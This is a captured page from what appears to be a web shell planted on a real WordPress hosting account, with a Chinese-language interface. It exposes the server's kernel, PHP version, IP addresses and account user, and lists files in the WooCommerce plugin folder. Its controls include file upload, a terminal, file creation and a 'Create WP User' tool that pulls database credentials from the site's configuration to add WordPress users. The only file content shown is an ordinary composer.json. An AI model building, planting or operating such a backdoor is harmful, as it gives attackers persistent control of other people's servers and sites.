Linux webm017.cluster130.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid x86_64
PHP/7.4.33
服务器IP :
10.130.20.17
& 您的IP :
216.73.217.47
域名 :
无法读取 [ /etc/named.conf ]
用户 :
koaigpw
上传
终端
新建文件
新建文件夹
Create WP User
登出
+
/
home
/
koaigpw
/
budomat.net.pl
/
wp-content
/
plugins
/
woocommerce
/
packages
/
blueprint
/
[ 返回根目录 ]
名称
大小
权限
修改时间
操作
..
-
-
-
src
[目录]
drwxr-xr-x
2026-05-24 02:35
blueprint.php
283.00 B
-rw-r--r--
2026-05-21 14:25
composer.json
1.31 KB
-rw-r--r--
2026-03-03 00:17
>_
终端
关闭 ✕
输入 'help' 查看可用命令。
koaigpw@
>
新建文件
文件名
取消
创建
重命名
新名称
取消
重命名
Create WordPress User
Auto (baca dari file CMS)
Manual (isi kredensial DB)
代码编辑器 :
composer.json
{ "name": "woocommerce/blueprint", "version": "0.0.1", "type": "wordpress-plugin", "autoload": { "psr-4": { "Automattic\\WooCommerce\\Blueprint\\": "src/" } }, "autoload-dev": { "psr-4": { "Automattic\\WooCommerce\\Blueprint\\Tests\\": "tests/" } }, "require": { "opis/json-schema": "^2.3" }, "scripts": { "test:setup": "wp-env start", "test:unit": "wp-env run tests-cli --env-cwd=wp-content/plugins/blueprint ./vendor/bin/phpunit", "phpcs": [ "phpcs -s -p" ], "phpcbf": [ "phpcbf -p" ] }, "require-dev": { "phpunit/phpunit": "^9", "mockery/mockery": "^1.6", "automattic/jetpack-changelogger": "3.3.0", "woocommerce/woocommerce-sniffs": "^1.0.0", "yoast/phpunit-polyfills": "^2.0" }, "extra": { "changelogger": { "formatter": { "filename": "../../../tools/changelogger/class-legacy-core-formatter.php" }, "types": { "fix": "Fixes an existing bug", "add": "Adds functionality", "update": "Update existing functionality", "dev": "Development related task", "tweak": "A minor adjustment to the codebase", "performance": "Address performance issues", "enhancement": "Improve existing functionality" }, "changelog": "changelog.md" } }, "config": { "allow-plugins": { "dealerdirect/phpcodesniffer-composer-installer": true } } }
关闭
保存